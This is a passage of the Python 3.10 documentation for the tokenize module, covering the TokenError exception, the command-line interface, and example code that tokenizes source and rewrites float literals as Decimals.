class="versionadded"> <p><span class="versionmodified added">New in version 3.2.</span></p> </div> </dd></dl> <dl class="py exception"> <dt class="sig sig-object py" id="tokenize.TokenError"> <em class="property"><span class="pre">exception</span><span class="w"> </span></em><span class="sig-prename descclassname"><span class="pre">tokenize.</span></span><span class="sig-name descname"><span class="pre">TokenError</span></span><a class="headerlink" href="#tokenize.TokenError" title="Permalink to this definition">¶</a></dt> <dd><p>Raised when either a docstring or expression that may be split over several lines is not completed anywhere in the file, for example:</p> <div class="highlight-python3 notranslate"><div class="highlight"><pre><span></span><span class="s2">"""Beginning of</span> <span class="s2">docstring</span> </pre></div> </div> <p>or:</p> <div class="highlight-python3 notranslate"><div class="highlight"><pre><span></span><span class="p">[</span><span class="mi">1</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">3</span> </pre></div> </div> </dd></dl> <p>Note that unclosed single-quoted strings do not cause an error to be raised. They are tokenized as <a class="reference internal" href="token.html#token.ERRORTOKEN" title="token.ERRORTOKEN"><code class="xref py py-data docutils literal notranslate"><span class="pre">ERRORTOKEN</span></code></a>, followed by the tokenization of their contents.</p> </section> <section id="command-line-usage"> <span id="tokenize-cli"></span><h2>Command-Line Usage<a class="headerlink" href="#command-line-usage" title="Permalink to this headline">¶</a></h2> <div class="versionadded"> <p><span class="versionmodified added">New in version 3.3.</span></p> </div> <p>The <a class="reference internal" href="#module-tokenize" title="tokenize: Lexical scanner for Python source code."><code class="xref py py-mod docutils literal notranslate"><span class="pre">tokenize</span></code></a> module can be executed as a script from the command line. It is as simple as:</p> <div class="highlight-sh notranslate"><div class="highlight"><pre><span></span>python -m tokenize <span class="o">[</span>-e<span class="o">]</span> <span class="o">[</span>filename.py<span class="o">]</span> </pre></div> </div> <p>The following options are accepted:</p> <dl class="std cmdoption"> <dt class="sig sig-object std" id="cmdoption-tokenize-h"> <span id="cmdoption-tokenize-help"></span><span class="sig-name descname"><span class="pre">-h</span></span><span class="sig-prename descclassname"></span><span class="sig-prename descclassname"><span class="pre">,</span> </span><span class="sig-name descname"><span class="pre">--help</span></span><span class="sig-prename descclassname"></span><a class="headerlink" href="#cmdoption-tokenize-h" title="Permalink to this definition">¶</a></dt> <dd><p>show this help message and exit</p> </dd></dl> <dl class="std cmdoption"> <dt class="sig sig-object std" id="cmdoption-tokenize-e"> <span id="cmdoption-tokenize-exact"></span><span class="sig-name descname"><span class="pre">-e</span></span><span class="sig-prename descclassname"></span><span class="sig-prename descclassname"><span class="pre">,</span> </span><span class="sig-name descname"><span class="pre">--exact</span></span><span class="sig-prename descclassname"></span><a class="headerlink" href="#cmdoption-tokenize-e" title="Permalink to this definition">¶</a></dt> <dd><p>display token names using the exact type</p> </dd></dl> <p>If <code class="file docutils literal notranslate"><span class="pre">filename.py</span></code> is specified its contents are tokenized to stdout. Otherwise, tokenization is performed on stdin.</p> </section> <section id="examples"> <h2>Examples<a class="headerlink" href="#examples" title="Permalink to this headline">¶</a></h2> <p>Example of a script rewriter that transforms float literals into Decimal objects:</p> <div class="highlight-python3 notranslate"><div class="highlight"><pre><span></span><span class="kn">from</span> <span class="nn">tokenize</span> <span class="kn">import</span> <span class="n">tokenize</span><span class="p">,</span> <span class="n">untokenize</span><span class="p">,</span> <span class="n">NUMBER</span><span class="p">,</span> <span class="n">STRING</span><span class="p">,</span> <span class="n">NAME</span><span class="p">,</span> <span class="n">OP</span> <span class="kn">from</span> <span class="nn">io</span> <span class="kn">import</span> <span class="n">BytesIO</span> <span class="k">def</span> <span class="nf">decistmt</span><span class="p">(</span><span class="n">s</span><span class="p">):</span> <span class="sd">"""Substitute Decimals for floats in a string of statements.</span> <span class="sd"> >>> from decimal import Decimal</span> <span class="sd"> >>> s = 'print(+21.3e-5*-.1234/81.7)'</span> <span class="sd"> >>> decistmt(s)</span> <span class="sd"> "print (+Decimal ('21.3e-5')*-Decimal ('.1234')/Decimal ('81.7'))"</span> <span class="sd"> The format of the exponent is inherited from the platform C library.</span> <span class="sd"> Known cases are "e-007" (Windows) and "e-07" (not Windows). Since</span> <span class="sd"> we're only showing 12 digits, and the 13th isn't close to 5, the</span> <span class="sd"> rest of the output should be platform-independent.</span> <span class="sd"> >>> exec(s) #doctest: +ELLIPSIS</span> <span class="sd"> -3.21716034272e-0...7</span> <span class="sd"> Output from calculations with Decimal should be identical across all</span> <span class="sd"> platforms.</span> <span class="sd"> >>> exec(decistmt(s))</span> <span class="sd"> -3.217160342717258261933904529E-7</span> <span class="sd"> """</span> <span class="n">result</span> <span class="o">=</span> <span class="p">[]</span> <span class="n">g</span> <span class="o">=</span> <span class="n">tokenize</span><span class="p">(</span><span class="n">BytesIO</span><span class="p">(</span><span class="n">s</span><span class="o">.</span><span class="n">encode</span><span class="p">(</span><span class="s1">'utf-8'</span><span class="p">))</span><span class="o">.</span><span class="n">readline</span><span class="p">)</span> <span class="c1"># tokenize the string</span> <span class="k">for</span> <span class="n">toknum</span><span class="p">,</span> <span class="n">tokval</span><span class="p">,</span> <span class="n">_</span><span class="p">,</span> <span class="n">_</span><span class="p">,</span> <span class="n">_</span> <span class="ow">in</span> <span class="n">g</span><span class="p">:</span> <span class="k">if</span> <span class="n">toknum</span> <span class="o">==</span> <span class="n">NUMBER</span> <span class="ow">and</span> <span class="s1">'.'</span> <span class="ow">in</span> <span class="n">tokval</span><span class="p">:</span> <span class="c1"># replace NUMBER tokens</span> <span class="n">result</span><span class="o">.</span><span class="n">extend</span><span class="p">([</span> <span class="p">(</span><span class="n">NAME</span><span class="p">,</span> <span class="s1">'Decimal'</span><span class="p">),</span> <span class="p">(</span><span class="n">OP</span><span class="p">,</span> <span class="s1">'('</span><span class="p">),</span> <span class="p">(</span><span class="n">STRING</span><span class="p">,</span> <span class="nb">repr</span><span class="p">(</span><span class="n">tokval</span><span class="p">)),</span> <span class="p">(</span><span class="n">OP</span><span class="p">,</span> <span class="s1">')'</span><span class="p">)</span> <span class="p">])</span> <span class="k">else</span><span class="p">:</span> <span class="n">result</span><span class="o">.</span><span class="n">append</span><span class="p">((</span><span class="n">toknum</span><span class="p">,</span> <span class="n">tokval</span><span class="p">))</span> <span class="k">return</span> <span class="n">untokenize</span><span class="p">(</span><span class="n">result</span><span class="p">)</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="s1">'utf-8'</span><span class="p">)</span> </pre></div> </div> <p>Example of tokenizing from the command line. The script:</p> <div class="highlight-python3 notranslate"><div class="highlight"><pre><span></span><span class="k">def</span> <span class="nf">say_hello</span><span class="p">():</span> <span class="nb">print</span><span class="p">(</span><span class="s2">"Hello, World!"</span><span class="p">)</span> <span class="n">say_hello</span><span class="p">()</span> </pre></div> </div> <p>will be tokenized to the following output where the first column is the range of the line/column coordinates where the token is found, the second column is the name of the token, and the final column is the value of the token (if any)</p> <div class="highlight-shell-session notranslate"><div class="highlight"><pre><span></span><span class="gp">$ </span>python -m tokenize hello.py <span class="go">0,0-0,0: ENCODING 'utf-8'</span> <span class="go">1,0-1,3: NAME 'def'</span> <span class="go">1,4-1,13: NAME 'say_hello'</span> <span class="go">1,13-1,14: OP '('</span> <span class="go">1,14-1,15: OP ')'</span> <span class="go">1,15-1,16: OP ':'</span> <span class="go">1,16-1,17: NEWLINE '\n'</span> <span class="go">2,0-2,4: INDENT ' '</span> <span class="go">2,4-2,9: NAME 'print'</span> <span class="go">2,9-2,10: OP '('</span> <span class="go">2,10-2,25: STRING '"Hello, World!"'</span> <span class="go">2,25-2,26: OP ')'</span> <span class="go">2,26-2,27: NEWLINE '\n'</span> <span class="go">3,0-3,1: NL '\n'</span> <span class="go">4,0-4,0: DEDENT ''</span> <span class="go">4,0-4,9: NAME 'say_hello'</span> <span class="go">4,9-4,10: OP '('</span> <span class="go">4,10-4,11: OP ')'</span> <span class="go">4,11-4,12: NEWLINE '\n'</span> <span class="go">5,0-5,0: ENDMARKER ''</span> </pre></div> </div> <p>The exact token type names can be displayed using the <a class="reference internal" href="#cmdoption-tokenize-e"><code class="xref std std-option docutils literal notranslate"><span class="pre">-e</span></code></a> option:</p> <div class="highlight-shell-session notranslate"><div class="highlight"><pre><span></span><span class="gp">$ </span>python -m tokenize -e hello.py <span class="go">0,0-0,0: ENCODING 'utf-8'</span> <span class="go">1,0-1,3: NAME 'def'</span> <span class="go">1,4-1,13: NAME 'say_hello'</span> <span class="go">1,13-1,14: LPAR '('</span> <span class="go">1,14-1,15: RPAR ')'</span> <span class="go">1,15-1,16: COLON ':'</span> <span class="go">1,16-1,17: NEWLINE '\n'</span> <span class="go">2,0-2,4: INDENT ' '</span> <span class="go">2,4-2,9: NAME 'print'</span> <span class="go">2,9-2,10: LPAR '('</span> <span class="go">2,10-2,25: STRING '"Hello, World!"'</span> <span class="go">2,25-2,26: RPAR ')'</span> <span class="go">2,26-2,27: NEWLINE '\n'</span> <span class="go">3,0-3,1: NL '\n'</span> <span class="go">4,0-4,0: DEDENT ''</span> <span class="go">4,0-4,9: NAME 'say_hello'</span> <span class="go">4,9-4,10: LPAR '('</span> <span class="go">4,10-4,11: RPAR ')'</span> <span class="go">4,11-4,12: NEWLINE '\n'</span> <span class="go">5,0-5,0: ENDMARKER ''</span> </pre></div> </div> <p>Example of tokenizing a file programmatically, reading unicode strings instead of bytes with <a class="reference internal" href="#tokenize.generate_tokens" title="tokenize.generate_tokens"><code class="xref py py-func docutils literal notranslate"><span class="pre">generate_tokens()</span></code></a>:</p> <div class="highlight-python3 notranslate"><div class="highlight"><pre><span></span><span class="kn">import</span> <span class="nn">tokenize</span> <span class="k">with</span> <span class="n">tokenize</span><span class="o">.</span><span class="n">open</span><span class="p">(</span><span class="s1">'hello.py'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span> <span class="n">tokens</span> <span class="o">=</span> <span class="n">tokenize</span><span class="o">.</span><span class="n">generate_tokens</span><span class="p">(</span><span class="n">f</span><span class="o">.</span><span class="n">readline</span><span class="p">)</span> <span class="k">for</span> <span class="n">token</span> <span class="ow">in</span> <span class="n">tokens</span><span class="p">:</span> <span class="nb">print</span><span class="p">(</span><span class="n">token</span><span class="p">)</span> </pre></div> </div> <p>Or reading bytes directly with <a class="reference internal" href="#tokenize.tokenize" title="tokenize.tokenize"><code class="xref py py-func docutils literal notranslate"><span class="pre">tokenize()</span></code></a>:</p> <div class="highlight-python3 notranslate"><div class="highlight"><pre><span></span><span class="kn">import</span> <span class="nn">tokenize</span> <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s1">'hello.py'</span><span class="p">,</span> <span class="s1">'rb'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span> <span class="n">tokens</span> <span class="o">=</span> <span class="n">tokenize</span><span class="o">.</span><span class="n">tokenize</span><span class="p">(</span><span class="n">f</span><span class="o">.</span><span class="n">readline</span><span class="p">)</span> <span class="k">for</span> <span class="n">token</span> <span class="ow">in</span> <span class="n">tokens</span><span class="p">:</span> <span class="nb">print</span><span class="p">(</span><span class="n">token</span><span class="p">)</span> </pre></div> </div> </section> </section> <div class="clearer"></div> </div> </div> </div> <div class="sphinxsidebar" role="navigation" aria-label="main navigation"> <div class="sphinxsidebarwrapper"> <h3><a href="../contents.html">Table of Contents</a></h3> <ul> <li><a class="reference internal" href="#"><code class="xref py py-mod docutils literal notranslate"><span class="pre">tokenize</span></code> — Tokenizer for Python source</a><ul> <li><a class="reference internal" href="#tokenizing-input">Tokenizing Input</a></li> <li><a class="reference internal" href="#command-line-usage">Command-Line Usage</a></li> <li><a class="reference internal" href="#examples">Examples</a></li> </ul> </li> </ul> <h4>Previous topic</h4> <p class="topless"><a href="keyword.html" title="previous chapter"><code class="xref py py-mod docutils literal notranslate"><span class="pre">keyword</span></code> — Testing for Python keywords</a></p> <h4>Next topic</h4> <p class="topless"><a href="tabnanny.html" title="next chapter"><code class="xref py py-mod docutils literal notranslate"><span class="pre">tabnanny</span></code> — Detection of ambiguous indentation</a></p> <div role="note" aria-label="source link"> <h3>This Page</h3> <ul class="this-page-menu"> <li><a href="../bugs.html">Report a Bug</a></li> <li> <a href="https://github.com/python/cpython/blob/3.10/Doc/library/tokenize.rst" rel="nofollow">Show Source </a> </li> </ul> </div> </div> </div> <div class="clearer"></div> </div> <div class="related" role="navigation" aria-label="related navigation"> <h3>Navigation</h3> <ul> <li class="right" style="margin-right: 10px"> <a href="../genindex.html" title="General Index" >index</a></li> <li class="right" > <a href="../py-modindex.html" title="Python Module Index" >modules</a> |</li> <li class="right" > <a href="tabnanny.html" title="tabnanny — Detection of ambiguous indentation" >next</a> |</li> <li class="right" > <a href="keyword.html" title="keyword — Testing for Python keywords" >previous</a> |</li> <li><img src="../_static/py.svg" alt="python logo" style="vertical-align: middle; margin-top: -1px"/></li> <li><a href="https://www.python.org/">Python</a> »</li> <li class="switchers"> <div class="language_switcher_placeholder"></div> <div class="version_switcher_placeholder"></div> </li> <li> </li> <li id="cpython-language-and-version"> <a href="../index.html">3.10.12 Documentation</a> » </li> <li class="nav-item nav-item-1"><a href="index.html" >The Python Standard Library</a> »</li> <li class="nav-item nav-item-2"><a href="language.html" >Python Language Services</a> »</li> <li class="nav-item nav-item-this"><a href=""><code class="xref py py-mod docutils literal notranslate"><span class="pre">tokenize</span></code> — Tokenizer for Python source</a></li> <li class="right"> <div class="inline-search" role="search"> <form class="inline-search" action="../search.html" method="get"> <input placeholder="Quick search" aria-label="Quick search" type="text" name="q" /> <input type="submit" value="Go" /> <input type="hidden" name="check_keywords" value="yes" /> <input type="hidden" name="area" value="default" /> </form> </div> | </li> </ul> </div> <div class="footer"> © <a href="../copyright.html">Copyright</a> 2001-2026, Python Software Foundation. <br /> This page is licensed under the Python Software Foundation License Version 2. <br /> Examples, recipes, and other code in the documentation are additionally licensed under the Zero Clause BSD License. <br /> See <a href="/license.html">History and License</a> for more information.<br /> <br /> The Python Software Foundation is a non-profit corporation. <a href="https://www.python.org/psf/donations/">Please donate.</a> <br /> <br /> Last updated on January 26, 2026. <a href="/bugs.html">Found a bug</a>? <br /> Created using <a href="https://www.sphinx-doc.org/">Sphinx</a> 4.3.2. </div> </body> </html>
Close